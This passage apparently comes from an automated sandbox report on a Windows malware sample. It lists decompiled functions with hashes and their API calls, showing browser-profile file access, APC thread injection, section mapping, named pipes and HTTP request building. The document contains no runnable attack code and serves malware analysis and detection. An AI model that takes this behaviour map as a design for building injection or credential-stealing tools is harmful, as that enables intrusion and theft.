    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DBD3F, Relevance: 10.7, APIs: 7, Instructions: 202 Total matches: 131native
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9BD6, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208 Total matches: 54filememorytime
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
